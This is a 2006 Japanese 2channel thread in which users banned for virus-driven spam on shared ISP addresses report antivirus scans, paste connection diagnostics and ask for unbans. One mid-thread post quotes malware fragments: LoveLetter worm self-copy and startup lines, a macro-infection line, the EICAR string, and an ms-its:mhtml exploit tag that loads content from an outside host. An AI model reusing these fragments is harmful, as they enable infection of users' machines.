Date of issue: Fri Aug 4 20:29:39 2006
IP Address:220.30.180.34
RemoteHost:softbank220030180034.bbtec.net
-- %ENV[Environment variable] --
HTTP_ACCEPT_LANGUAGE : ja
HTTP_CONNECTION : Keep-Alive
HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
REMOTE_ADDR : 220.30.180.34
REMOTE_HOST : softbank220030180034.bbtec.net
REMOTE_PORT : 1671
-- DSBL --
220.30.180.34 -> None(^-^)
-- BBQ --
220.30.180.34 -> Roasted(-_-)
-- BBX(Unrelated to the proxies.) --
220.30.180.34 -> La ROCA es la vida.(-_-)
-- Tor(an anonymizing overlay network for TCP) --
220.30.180.34 -> None(^-^)
-- PORT CHECKING --
PORT 80: Result:refuse
PORT 1080: Result:refuse
PORT 3128: Result:refuse
PORT 8000: Result:refuse
PORT 8080: Result:refuse
PORT 8888: Result:refuse
ERROR:公開PROXYからの投稿は受け付けていません!!(1)と出ます
宇治金時ですかね・・・
二人ともウイルスです
http://qb5.2ch.net/test/read.cgi/sec2chd/1150980451/744 ここをよく読んでください
その後
http://qb5.2ch.net/test/read.cgi/sec2chd/1150980451/757 ※診断書には読めばわかると思いますが
「ウイルスで焼かれた」とかそういった内容は書いてありません
なので診断書のコピペをする意味はありませんので
他の方も診断書のコピペはしないでください
山田チェッカー偽装にやられました
手動&Spybotにてレジストリ削除にて対応しました
週末に巻き添えBBQとかマジ勘弁
踏んでないから当たり前だけど、バスターで感染してないことを確認。
avastでスキャンしましたが検出させませんでした
※共有アドレスでウィルス規制されている方へ※
leo-net、CATVなど共有アドレスの場合、
たとえあなたが感染していなくても同一ホストの他の方が感染しているため、
すぐに解除はできません。
念のためあなたもウイルスチェックをした上で、プロバイダさんの方へ
「他の方がウイルスに感染していること」
「そのため2ちゃんねるで規制されていること」
を伝え、何らかの対処を依頼してください。
プロバイダさんからのお返事の内容を確認して、
解除しても大丈夫かどうかを判断します。
参照
http://qb5.2ch.net/test/read.cgi/sec2chd/1150980451/344,346-347,352,354,376,384,420-424 規制関連の関係者の皆様へ
よろしければ教えてください。
leo-netの場合、何もやらないことをユーザーへ返事しています。
この場合規制解除は永遠に無理でしょうか?それともほとぼりが冷めたと
思えた時点(たとえば半年後、一年後など)で解除ということもあり得ますか?
現状プロバイダが何もしないことを公言していますので、解除の望みはこれ以外には
考えられません。
お返事をいただければ幸いです。
こうなったら
>>319コピペして社員にメール送ろうぜ
leo-netの形態がどんなか知らないんだが
「自社の契約ユーザがウィルス感染して個人情報タレ流しの危機にあり、
他のユーザからの通報で状況を認識してるのに注意喚起もしない」
そんな糞プロバ解約して他のISPと契約って選択肢はないのかな
感染者を特定してからレオパに通報すれば何とかなるはずです!
8/4の20時頃に残存してたログでは一人も発見できなかったので、dat落ちスレを読めるかた、協力お願いします!
諦めたり文句を言うのは簡単だけど、諦めないかた、マジで協力をお願いします!!
半角二次元の過去ログ倉庫に行って、8/3以降に落ちたスレを全部、1-1000まで全表示できる状態で「leo-net」で検索してください。
片っ端からスレを開いて、見つかったレスのgk*.leo-net.jp、PC名、ユーザ名をリストアップする。
同一人物で複数うpされてるものは、1人としてカウントしていいと思います。
膨大なログを調べて、全てリストアップしなければいけないから骨が折れるとは思いますが。
投稿者検索とか、もっと効率のいい探し方があるんだろうけど、俺は壷もってないので詳しく知りません。
不明だけど、最低、gk3が1名以上、gk8が1名以上は感染しています。それ以外のgk*は大丈夫かも知れない。
レオパにリストを送り、「この人達が亀田ウィルスに感染しているから同一IPの人に注意を呼びかけてください」とお願いする。
やがてレオパから自分のPCに注意メールが届けば、対処しようとしてくれた証にはなる。
そこに当人達がウィルス退治したらレオパに連絡いれるように一筆入れてもらう。
リスト全員からレオパに連絡がいけば、2ちゃんに報告してもらう。これで解決すると思うけど、どうでしょう。
(これで対処してくれない時は、その時こそ文句を言っていい)
ウィルス駆除にはTrendMicro社のウィルスバスターオンラインスキャンを使用しました
宇治ウィルスのファイル名は「TSPY_SUFIAGE,G」でした
お手を煩わせてしまい、誠に申し訳ありません。
>>322 賃貸でレオパレス21に入居したら強制的にleo-netだった
という学生さんがほとんどでFA?
自社賃貸物件とセットにして他のISPと契約という選択肢を与えないから
サービス内容で差をつけずともやっていけるという仕組み・・・ですよね、明らかに。
前回leo-net全面規制時の対応内容からいっても。
>>324 レオパにリストを送り、「この人達が亀田ウィルスに感染しているから同一IPの人に注意を呼びかけてください」とお願いする。
↑
レオパレス側が何もしないことを公言してるからこの時点で無理。
そもそも呼びかけが可能ならインターネットのログイン時に全員に呼びかけをして、
「レオパレス側としてはウィルス感染の注意を促しました。」→規制解除検討になるかもしれない。
いや、レオパ側が動かないからどうしようもないんだけどね。
>>324 過去スレ検索できるのなら、去年の荒らし騒ぎを検索してみればいい。
レオネットがどんなログを取っていて、どんなログを取っていないかよくわかるよ。
俺の書き込みは「ログを取られている」ことを前提に書いているからいいんだけどさ。
>同一IPの人に注意を呼びかけてください」
私もあなたも同じIPですよ。gk3.leo-net.jp (138.243.201.1) のはずです。
もちろんプライベートアドレスは違うんだろうけど。
レオネットにちゃんとログがあって、ウイルスによるアクセスがすべて把握できて
そのユーザーの通信だけを遮断する。これだけのことを「レオネットがやると言ってくれる」
なら、2ちゃんねるは解除してくれるよ。これをレオネットに言わせないとダメなんだよ。
去年の荒らし騒ぎの時も同じだった。けど結局言わせたのは総務省関係者だったんだよ。
ユーザーの声で動くプロバイダではない。それをちゃんとわかった上で行動しないと
無駄な労力ばかりなんだ。
私は
>>324さんに言いたいのではない。この書き込みはログに残しているであろう
レオネットへ向けていることだけはわかって欲しい。
議論や提案は発散させないために以下のスレでしてみないか?
そうすればみんなで統一行動がとれると思う。
◆◇◆◇◆日本leo-net共同体党◆◇◆◇◆
http://sports2.2ch.net/test/read.cgi/operatex/1126449864/l50 http://qb5.2ch.net/test/read.cgi/sec2chd/1150980451/680 680:水色@飛行石 ★:sage:2006/08/04(金) 01:58:50 ID:???0
>>677 誰かがやってくれると思わず自分で動きましょー。
1ヶ月コースで焼いてますのでー。
1ヶ月して爆撃再開したら、また焼きますのでー。
1ヶ月たったら一旦解除されるんですか?
>>328 今回は、荒らしの時と違って、そのユーザーを遮断とかじゃなくて、
ウィルス感染の警告と駆除をお願いするのだから、希望はありませんか?
>>318の参照を見て貰えば判りますが、その方も始めはISPに拒否されています。
でも、そのユーザーのせいではなく、警告のお願いだったので、
最後には対応して貰っています。
ISPは規制とかに関することは他のユーザーからの意見は聞いてくれないっぽいですが、
今回は又、事情が違うと思いますが、一度やってみる価値はありませんか?
>>319 現時点では何とも言えません。
>>331 一ヶ月焼きで様子をみて
爆撃再開→永久焼きになる可能性もあるって事かと。
>>334 四つんばいになれば規制を解除して頂けるんですね?
今日、俺が丁寧な口調で警告出すようお願いしておいたから
2〜3日様子みてくれ。
http://live14.2ch.net/test/read.cgi/liveplus/1154796117/ ここのスレをクリックするとウイルス検出されるぞ
なんなんこれw意味わからん こんなの初めてだ
sage ms-its:mhtml:file://c:\[ これが原因?
あーーーー
上記のsage re 張ったらここも検出された
スマソ・・・・・・・・
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm"; type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)) 2人も駆除してくださったという収穫。
再発したらまた対応できるんじゃないでしょうか。
解除することで、荒らされるかもしれないスレ、
対応していただけなければならないRockerさん、etc
多くの方にご迷惑を掛けることも、そりゃあるかもしれないですが。
そういうことに細かく対応できるための人海戦術なんじゃないかなっと。
#あくまで単なる野次馬として。
一応転載
http://qb5.2ch.net/test/read.cgi/sec2chd/1154777583/48 48 生姜焼き ★ sage 2006/08/06(日) 10:01:41 ID:???0 @
とはいっても確かに「少なくとも2人はいる」のは確認してるけど
3人目がいるかどうかはわからないんですよね
さて、どうしましょ?>焼きのみなさん
> asf-cable.c-able.ne.jpのみなさま
一応解除しましたが、再発した場合は再び焼きますので、
それだけはご承知下さい。
>>340の続きということで見てください
解除要請の理由といたしましては
・感染者リストの2人のウイルス駆除が完了したこと
・3人目の感染者がいるという根拠がないこと
・プロバイダ側で感染者を特定したとしても リストを手がかりにするため リストの2人以外の感染者を特定することは不可能なこと
・今回規制されたのは この2人の感染が確認されたためだということ
・3人目の感染者の存在を疑う場合 他の規制されてないホストのことはどうなるのか キリがない
の点です
>>343 解除されたようですね
ありがとうございます
これで後は30分ぐらい待てばスレに書き込めるようになるのかな…?
全鯖に浸透するには、時間差がありますのでしばしお待ちを。
お客様
平素は大変お世話になっております。
レオパレス21ブロードバンド事務局 河上と申します。
お問合せ頂きました件につきましてご回答申し上げます。
お客様ご申告の件に関しまして弊社にて状況の確認を
させて頂きますので、今しばらくお待ち下さいませ。
なお、状況によりお時間がかかる場合がございますので
予めご了承の程宜しくお願い致します。
ご不明な点は下記コールセンターまでお問い合わせをお願い致します。
今後ともレオパレス21を何卒宜しくお願い申し上げます。
これってウイルス所持者の調査をして対応してくれるってことでFA?
>>350 ちょっと解除してみましたー。
暫くたったら浸透すると思いますー。
>>351 同じく規制中の「gk8.leo-net.jp」は解除になりましたでしょうか?
同じレオネットとして気になっております。leo-net.jp全体の解除なのか
それともgk3だけの解除なのか、よろしければ教えてください。
それはgk8のホスト名で
>>350と同じような返答貰うまで無理なんじゃないかねぇ
>>354 既に書けてるようです。全体じゃないですか?
>>354 俺も8だけどよそでは書けた。でもこの板ではかけない・・・
-- Your diagnosis --
Date of issue: Sun Aug 6 19:00:10 2006
IP Address:202.122.192.129
RemoteHost:vip1.lcv.ne.jp
-- %ENV[Environment variable] --
HTTP_ACCEPT_LANGUAGE : ja
HTTP_CONNECTION : Keep-Alive
HTTP_REFERER :
http://www.google.co.jp/search?sourceid=navclient&hl=ja&ie=UTF-8&rls=GGLG,GGLG:2006-16,GGLG:ja&q=%E9%A2%A8%E5%91%82%E6%95%B7%E3%80%80%E7%A2%BA%E8%AA%8D HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
REMOTE_ADDR : 202.122.192.129
REMOTE_HOST : vip1.lcv.ne.jp
REMOTE_PORT : 36304
-- DSBL --
202.122.192.129 -> None(^-^)
-- BBQ --
202.122.192.129 -> Roasted(-_-)
-- BBX(Unrelated to the proxies.) --
202.122.192.129 -> None(^-^)
-- Tor(an anonymizing overlay network for TCP) --
202.122.192.129 -> None(^-^)
-- PORT CHECKING --
PORT 80: Result:refuse
PORT 1080: Result:refuse
PORT 3128: Result:refuse
PORT 8000: Result:refuse
PORT 8080: Result:refuse
PORT 8888: Result:refuse
金曜日からだめなんですが・・・
とりあえず第一には自らのウイルスチェックですなあ
>>361 書き込めました。
ありがとうございました。
山田チェッカーウイルスにやられました。
AVGと手動にて、ウイルス(ウイルスネーム;Trojan horse Generic.YRK)削除&
レジストリ修復をしました。規制解除をして頂けますでしょうか。
あー、規制解除されてましたね。
申し訳ありませんでした。
>>235ということは解除していただけるのでしょうか?
当方CATVの共有ホストで8/4からウイルス焼きされています
株式会社レオパレス21様より書き込みできないとの連絡がありました。
それで返答しようと思ったのですがウィルス焼きされた日時を確認
出来ませんでしたのでご存じの方がいらっしゃいましたらよろしく
お願いします。
>>370 ログでは以下の通り残ってました。
gk8.leo-net.jp 2006/08/04(Fri) 02:24:30
gk3.leo-net.jp 2006/08/03(Thu) 22:12:36
#今は解除済み
-- Your diagnosis --
Date of issue: Mon Aug 7 07:30:02 2006
IP Address:219.117.176.253
RemoteHost:white1.scn-net.ne.jp
-- %ENV[Environment variable] --
HTTP_ACCEPT_LANGUAGE : ja
HTTP_CONNECTION : Keep-Alive
HTTP_REFERER :
http://info.2ch.net/wiki/pukiwiki.php?%A4%CA%A4%F3%A4%AB%B5%AC%C0%A9%A4%B5%A4%EC%A4%C6%A4%A4%A4%EB%A4%DF%A4%BF%A4%A4%A4%CA%A4%F3%A4%C7%A4%B9%A4%AC%A1%C4 HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
REMOTE_ADDR : 219.117.176.253
REMOTE_HOST : white1.scn-net.ne.jp
REMOTE_PORT : 43987
-- DSBL --
219.117.176.253 -> None(^-^)
-- BBQ --
219.117.176.253 -> Roasted(-_-)
-- BBX(Unrelated to the proxies.) --
219.117.176.253 -> None(^-^)
-- Tor(an anonymizing overlay network for TCP) --
219.117.176.253 -> None(^-^)
-- PORT CHECKING --
PORT 80: Result:refuse
PORT 1080: Result:refuse
PORT 3128: Result:refuse
PORT 8000: Result:refuse
PORT 8080: Result:refuse
PORT 8888: Result:refuse
ERROR:公開PROXYからの投稿は受け付けていません!!(1)と出ます
診断書をむやみに貼る人は、
スレをまるで読んでないとみなされスルーされます。
>>372です。
2日前から書き込みが出来なくなりました。
【DSBL】PROXY規制中!【報告無用】のスレを見ても何がなんだか分からなくて・・・。
ウイルススキャンしたところウイルスは検出されていませんでした。
ケーブル系なんですが、ブロバイダに相談すれば解除できるのでしょうか?
4日ほど前に山田チェッカーウイルスにやられました。
AVGと手動にて、ウイルス(ウイルスネーム;Trojan horse Generic.YRK)削除&
レジストリ修復をしました。規制解除をして頂けますでしょうか。
湘南ケーブルネットワーク様より書き込み規制についての問い合わせが
ありました。
ウィルス焼きの原因のログが見つかりませんでしたのでご存じの方が
いらっしゃいましたらよろしくお願いします。
さきほどふしあなで書き込もうとしたら連投規制が出ました
ウイルススキャンしたら書き込めるようになりました。
愛媛catvは私が原因でしょうか?
ウイルスは、newsvip、マカフィーで削除しました
>>376 これかな?
http://halcyan.30.kg/klist/list.php?filepattern=-106-8-&kwd_sv=&kwd_host=scn-net.ne.jp sakura02.bbspink.com 2006/08/04(金) 00:06:31 white1.scn-net.ne.jp
http://halcyan.30.kg/klist/list.php?filepattern=-106-7-&kwd_sv=&kwd_host=scn-net.ne.jp sakura02.bbspink.com 2006/07/31(月) 02:08:20 white1.scn-net.ne.jp
sakura02.bbspink.com 2006/07/31(月) 01:21:05 white1.scn-net.ne.jp
sakura02.bbspink.com 2006/07/31(月) 01:19:21 white1.scn-net.ne.jp
sakura02.bbspink.com 2006/07/31(月) 01:19:17 white1.scn-net.ne.jp
sakura02.bbspink.com 2006/07/31(月) 01:08:21 white1.scn-net.ne.jp
sakura02.bbspink.com 2006/07/31(月) 01:08:10 white1.scn-net.ne.jp
sakura02.bbspink.com 2006/07/31(月) 01:07:49 white1.scn-net.ne.jp
sakura02.bbspink.com 2006/07/31(月) 00:58:48 white1.scn-net.ne.jp
sakura02.bbspink.com 2006/07/31(月) 00:53:57 white1.scn-net.ne.jp
sakura02.bbspink.com 2006/07/31(月) 00:49:51 white1.scn-net.ne.jp
sakura02.bbspink.com 2006/07/31(月) 00:46:08 white1.scn-net.ne.jp
sakura02.bbspink.com 2006/07/31(月) 00:45:15 white1.scn-net.ne.jp
http://qb5.2ch.net/test/read.cgi/sec2chd/1144136159/94 white2.scn-net.ne.jp 18res
http://sakura03.bbspink.com/test/read.cgi/ascii2d/1129185674/950,958,968 white5.scn-net.ne.jp
ログ5G超えてた・・おrz
>>378補足
虹のポストは全部追っていません。
一部かも
ip family.e-catv.ne.jp 219.109.48.4で規制を受けたのは私のようです。
2ちゃんのせんぶらの過去ログに感染していたようです、ノートン先生で検出して削除しました。
WScript.KakWorm Bloodhound.Exploit.6 Macro.src Unix.Penguin
4つのウイルスが出ました。
一応これで問題解決したようなので、規制解除をお願いしたいのですが・・・
それいわゆる「ウイルスコード」に反応しただけじゃ?
さっきはマカフィーでも3つ引っかかったんですよ
それに別のところ規制スレで私が任意でつけたIPが乗ってたんですよ
687 名前:AirRock ★ 投稿日:2006/08/06(日) 18:38:40 ???0
お願いします。
comic6 2006/08/06(日) 14:47:38〜18:30:00
共有
family.e-catv.ne.jp 219.109.48.4
689 名前:生姜焼き ★ 投稿日:2006/08/06(日) 18:56:26 ???0
>>687 全部焼きましたー
※family.e-catv.ne.jpは共有とはいえ多いので焼きました
参考
http://halcyan.30.kg/klist/list.php?filepattern=106-8&kwd_sv=comic6&kwd_host=family.e-catv.ne.jp >>384 あなたのIPは共有ですから
たくさんの人が同じものを使っています
>>385 リモートホストとは別の219.109.48.4はうちのルータをいじってかえたものなんですが・・・
ウイルス爆撃相談所にはそのipが張られていたんですよ
一応、ノートントラップだけでなく、マカフィーでも3つファイルが出たんで・・・
あなたはもっとご自分のネット環境について知識を実に付けた方がよい
family.e-catv.ne.jpというリモホを変えられるなら今ここで変えてみなさい
>>386
あと family.e-catv.ne.jp ←リモートホスト
219.109.48.4 ←IP
ただ変換しただけだから
参考 http://www.ghiblies.net/cgi-bin/host/ まあ、問題ないなら別にいいです
マクァフィーのほうもノートンと同じところから検出しましたし
つまり規制の場合はリモホからしか解らんのですな。
個々のルータで設定しているアドレスは関係なしで
で2chの過去ログのとこにあるってのは今回のウイルスとは全く無関係です
>>382-383の通りです
そうでした、ルータで変えれるやつはグローバルipとか言うのに変えたんでした、忘れてました。
お手数かけました。どうも。
では愛媛catvに抗議してきます
>>392 頼みましたぞ・・・早く・・・規制解除・・・を・・・
>>393 あなたもしなさいよ
抗議するユーザーが多ければ、それだけ対応が早まるでしょ
-- Your diagnosis --
Date of issue: Mon Aug 7 22:41:16 2006
IP Address:219.124.202.69
RemoteHost:kctv58069.ccnw.ne.jp
-- %ENV[Environment variable] --
HTTP_ACCEPT_LANGUAGE : ja
HTTP_CONNECTION : Keep-Alive
HTTP_REFERER :
http://info.2ch.net/wiki/pukiwiki.php?%A4%CA%A4%F3%A4%AB%B5%AC%C0%A9%A4%B5%A4%EC%A4%C6%A4%A4%A4%EB%A4%DF%A4%BF%A4%A4%A4%CA%A4%F3%A4%C7%A4%B9%A4%AC%A1%C4 HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP________________ : ~~~~~ ~~~~~~~
REMOTE_ADDR : 219.124.202.69
REMOTE_HOST : kctv58069.ccnw.ne.jp
REMOTE_PORT : 1881
-- DSBL --
219.124.202.69 -> None(^-^)
-- BBQ --
219.124.202.69 -> Roasted(-_-)
-- BBX(Unrelated to the proxies.) --
219.124.202.69 -> None(^-^)
-- Tor(an anonymizing overlay network for TCP) --
219.124.202.69 -> None(^-^)
-- PORT CHECKING --
PORT 80: Result:refuse
PORT 1080: Result:refuse
PORT 3128: Result:refuse
PORT 8000: Result:refuse
PORT 8080: Result:refuse
PORT 8888: Result:refuse
山田ウィルス治しました。
よろしくお願いします。
>>397
つ【テンプレ】
・名前欄に「fusianasan」と入れてあなたのホストを表示
・使用したアンチウィルスソフトorサービス(無論、ウイルス定義は最新で)
・ウィルス定義のエンジンバージョン・DATバージョン
・見つかった(駆除した)ウィルスの名称 >>398に追加
診断書をコピペして貼った場合は、スレを全く読んでいないものとみなされて
対応されません(
>>274 >>313-314 >>399)
要するに、診断書を貼る=「対処しなくて構いません」と書いたのと同じ
共有IP云々と言われた場合は
>>318 >>397 本当に申し訳ございませんでした。
クリーンインストールしましたので、もう大丈夫です。
感染ファイル元は「山田ウィルスチェッカー.exe」
ウィルス名は「Backdoor.Trojan」(Norton AntiVirus 2005で確認しました。)
ウィルス定義ファイルは2006/08/03です。
>>401 すいません。新しい書き込みを見てませんでした。
レスやスレで調べてきます。
kctv58069.ccnw.ne.jpさん、
解除しました
全板に書けるようになるまではもうしばらくかかります
のんびりお茶でも飲んでもうちょっと待っててください
カスペルスキー オンラインスキャナ
OS: Microsoft Windows XP Home Edition, Service Pack 2 (Build 2600)
カスペルスキー オンラインスキャナ バージョン: 5.0.78.0
感染: Backdoor.Win32.Delf.afu
削除しました
使用したアンチウィルスソフト:ウイルスバスター2006
ウィルスの名称:
TSPY_LINEAGE.UE
HTML_CRINET.A
ウイルス隔離
ウイルスが見つかった感染ファイルが、隔離フォルダに移動されました。
隔離されたファイルは、そのまま放置しても問題ありません。
と、出ました。
それと、半角二次のみにウイルスの影響が有るのでしたら、
半角二次以外の規制はどうにかならないのでしょうか?
個人的に、21歳でもないので他の板に書き込みたいのですが…。
再発の恐れがあるのでしたら、半角二次のみに規制を入れてくれませんか?
ついでに答えて下されば光栄で御座います。
ウィルスバスター2006とノートンでチェック済み
ウィルス検出されませんでした
規制解除してください
愛媛catvは
よくわからないから何もできませんと抜かしました。
いったい我々愛媛県人はどうすればいんでしょう・・・・
>>408 うーん。
どちらも焼きの原因になったウィルスとは違うような感じ
>>413 あなたの焼かれている原因はウィルスです。
TSPY_LINEAGE.UE
HTML_CRINET.A
以外に駆除できていないウィルスがまだあるんじゃないかと。
使用したソフト:AVGを使用しました。
ウイルスファイル定義:06/08/03です。
ウイルス名:Trojan horse Generic.YRKです。
感染ファイル元:山田ウイルスチェッカー.exeでした。
規制解除をお願いいたします。
>>414 もしかしてコレでしょうか?
TSPY_LINEAGE.YS
使用したものと、対処は
>>408と同じです。駆除いたしました。
最新版にアップデートをして新たに検索しましが、
他にウイルスは見つかりませんでした。
>>418 同じウィルスソフトを使っても
対応状況はあまり変わらないかもしれないので
別のソフトを試してもらえますか?
カスペルスキーオンラインスキャナ
http://www.kaspersky.co.jp/scanforvirus/ >>409です
ノートンでチェックをかけたら
Bloodhound.Exploit.
Macro.src
VBS.Freelink.B
WScript.KakWorm
が検出されました。
いずれもJaneのログに感染していて
駆除も完了しています。
規制解除をお願いします。
ノートンでチェックしたらトロイの木馬(細かい名前は忘れました)が検出されました
ノートンとバスターをはしごしたので駆除は終わったと思います
ウイルスが原因でしたら解除お願いします
Backdoor.Trojan
ノートンで出たのはたしかこの名前だったと思います
バスターでは何も検出されませんでした
再度ノートンをかけましたが、
何も検出されませんでした。
問題がなければ解除してください。
先のオンラインスキャナを使った
Trojan.Win32.KillFiles.k
Trojan.Win32.VB.aqp
Trojan.Win32.Haradong.a
WExploit.HTML.CodeBaseExec
oExploit.HTML.Mht
rm.Win32.Antinny.ao 検出されました
IPアドレスとリモートホスト名
Your IP address is 221.80.198.171
Your RemoteHost is softbank221080198171.bbtec.net
>>372 >>376 >>378 これはつまりこういうこと?
・SCNユーザーの誰かがウイルスに感染しているのでアクセスを禁止された
・SCN側は2chに問い合わせを入れその事実を確認した
・しかし今だ対応は取られておらず今もアクセスは禁止されたまま
解除されるまで時間がかかるのでしょうか
マターリ待ちます
>>429 ・SCNユーザーの誰かがウイルスに感染しているのでアクセスを禁止された
・SCNユーザーの有志がSCNに感染してる奴がいるから、なんとかしてくれと連絡を入れた
・SCNから、2chセキュリティに問い合わせがあった
・2chセキュリティが該当ログをSCNに送った
・それを元に、SCNは今該当者を割り出し中(多分)←今ここら辺
・SCNは該当者が分かれば警告し対応が終わったら、2chに連絡が来る(多分)
・そしたら、規制は解かれるかも知れない(゚д゚)ウマー
どうしてふしあなしてもこのスレにかけないのはなんでだぜ?
>>429 SCNに問い合わせてみたら解除に一ヶ月掛かるそうな。orz
その前にウイルスの活動量が少なくなれば解除されるらしいけど・・・。
>>408です
ご迷惑をお掛けして、本当に申し訳ありません。
新たにウイルスを発見できたので報告します。
Win−Adware/Emusic
Win-Dialer/XJp
Win-Adware/Shortcut.InlivePlay
の三つを駆除いたしました。
使用したソフトは、
「V3 ウイルスブロック 2007 プラチナ 体験版」です。
問題がなければ、解除の方をお願いします。
>>437 今回問題になってるウイルスとは違うと思うけど、なんかボロボロだね・・・。
いっそうの事、リカバリしちゃった方がいいかも。
a131035.usr.starcat.ne.jp
☆猫、早く解除してください
>>437は見なかった事にしてくださいorz
>>438様
Win-Torjan〜
で始まった奴が沢山出てきましたー
なんかもうアレですね。
勘違いしまくりでしたorz
833感染って…頑張って見ます。
プロバイダーにウィルス発信ユーザーへの警告依頼をお願いしたところ
「該当ユーザーを共有ホストから除外」との返信がありました。
規制解除して頂けないでしょうか。
>>435です。
Live2chのログにラブレターが有ったので削除しました。
他にも申告当しなければ駄目ですかね?
>>422 IPが変わってますね。書き込めるはずです。
それにログにあるのは、ウィルスコードなので違います
>>441 丹南ケーブルテレビ
▼基本サービス
●IPアドレス自動割当
感染してるのおまえだけだろwww
>>445 http://info.2ch.net/wiki/pukiwiki.php?Rock54#content_1_3 BBX,klistとの関係
>規制対象の文字が書かれると、BBXというところに記録されます。そして、同じIPアドレスから、規制対象文字が3回書かれると、そのIPからの規制文字入りの書き込みが、すべてシャットアウトされるのが、Rockの仕組みです。
>klistは、実際にRock規制に引っかかったログを記録するところです。
ウイルス書き込みが1回か2回の時点で焼かれたんじゃない?
>>444 ▼以下の場合、事務手数料1,050円が必要となります。
●IP変更(例:プライベートIPからグローバルIP)
アフォですか?
>>446 どうもです
未だにウィルススキャンしてないのかな?
BBQチェックだけBBQにされてますよ( ̄ー ̄)ニヤリッと出ている場合は、何らかの事由(大量広告爆撃など)で規制されています。
諦めるのがいちばん早い解決法でしょう。。。
>これなんですがどうすればいいのでしょう(DSBLスレのほうに間違って書いてしまいました)
>450 えと、ウイルスによる爆撃で焼かれていますね。
オンラインウィルススキャン等で駆除してきてください。
で、駆除したウィルス名を報告してくださいね。
>451
よくわからなかったのでリカバリしましたがまだ書けません
これで解除してもらえるんでしょうか
>453
リカバリしちゃったのでしたら消えちゃってますよね。。。。
それでは、解除してみます。
>454
念のため現在調べています。調べてから書けばよかった。すいません。
>456
解除しました。
遅延がありますので20分ほど待ってみてください。
野焼きさん、有難うございました。
大変お世話になりました。
どうしたら解除していただけるのでしょうか?
http://qb5.2ch.net/test/read.cgi/sec2chd/1147466895/658 こちらを見ると、ウィルスによる規制と巻き添えだと思うのですが
何度チェックしても当方PCは感染はしておりませんでした
待てば解除されますか?
解除していただきたいです。宜しくお願い致します。
昨日の午後は書けてたのに
急に書き込めなくなりました(´・ω・`)
ウィルスバスター(プログラムバージョン14.00.1341)で検索した結果、ウィルスは発見されませんでした
自分もいわゆる「ウィルス焼き」だと思うのですが・・・
解除よろしくお願いします。
>>463 プロバイダに対応してくださいってメールを出してくださいー。
ウイルス感染者がいるってことでー。
繋ぎ替えで絨毯爆撃するんで範囲焼きしてますー。
http://halcyan.30.kg/klist/list.php?filepattern=-106-8-&kwd_sv=comic6&kwd_host=acoska 他にも幾つかプロバイダ範囲焼きしたんですけどー、誰も言ってこないなー。
まーそのまま続行するだけですがー。
最近1週間くらい前から書き込みが出来なくなりました。
書き込もうとすると
ERROR! 公開PROXYからの投稿は受け付けていません!!(1)と出ます。
またBBQチェックだけBBQにされてますよ( ̄ー ̄)ニヤリッと出ています
当方のPCはウィルスバスター2006でチェックしました
>>463氏と同じプログラム
です。
多分「ウィルス焼き」だと思います、解除して頂ければ幸いです
>>465 駆除したウィルス名を報告してください。
>>466 すみません補足です。
当方のPCではウィルスは検出されてないです。御迷惑をお掛けします
>>643です(´・ω・`)
ウィルスバスターでは見つからなかったけど
ノートンでオンラインスキャンしてみたところウィルスに感染していました
ウィルス名は
VBS.Freelink.B
Unix.Penguin
Macro.src
MHTMLRedir.Exploit
Bloodhound.Exploit.6
で合計12こでした(´・ω・`)
アンカーミスですorz
>>463でした(´・ω・`)
プロバイダからの返事がきました
>まずは返答が遅くなったことをお詫び申し上げます。
>現在ログの提出を待っている状況にあり、該当ユーザ特定後は速やかにウイルス削除 を
>行っていただけるよう対応を進めてまいります。
>ORDB.orgについても並行して削除の手続きを行っておりますので今しばらくお待ちい
>ただければと思います。
との事です
今見て来たのですが、ORDB.orgのブラックリストも解除されたようなので
解除のほう、お願いできますでしょうか?宜しくお願いします
>現在ログの提出を待っている
どんなログを誰から出されるのを待ってるんだろー?
あれ、間違えたのでしょうか(´・ω・`)
ISPには、共有IPにウイルス感染者がいて爆撃してるから駆除してください
と伝えたのですが・・・
>>478 そうです、それです!ダメなんですか(´・ω・`)
>>468 返事ありがとうございます、早速対応してみます
>>481 わかりました、再度メールしてきます。ありがとうございました
SCNユーザーですが
SCNのサポート掲示板で
3861 2ちゃんねる掲示板への書き込み規制について SCN-NET 〔2006/08/11-15:14〕
現在、2ちゃんねる掲示板管理者と協議の上、
書き込み禁止の原因と思われるウィルス感染者に対し注意・対策
をお願いいたしておりますが、書き込み規制解除日程等の連絡は現状ございません。
http://www.scn-net.ne.jp/cgi-bin/user/sn_trbbs.cgi?uid=support&df=sn_bbs.dat&prm=TAN&pg=1&no=3861#3861 どうやらSCN側は対策を進めてるみたいですけど
その先で連絡待ちみたいになってて停止してるみたいなので
ユーザの方からお願いしたいのですが
解除していただけないでしょうか
お客様サポート掲示板
--------------------------------------------------------------------------------
この掲示板はSCN-NETの会員様以外はご利用になれません。
(SCN-NETに接続されているパソコンからのみアクセス可能です。)
ふむ
>2ちゃんねる掲示板管理者と協議の上
誰と協議してるんですかね?
reffiさんあたりかな?
すいません 一応全文です
3861 2ちゃんねる掲示板への書き込み規制について SCN-NET 〔2006/08/11-15:14〕
返信 : HomePage : Email : 編集 : 削除
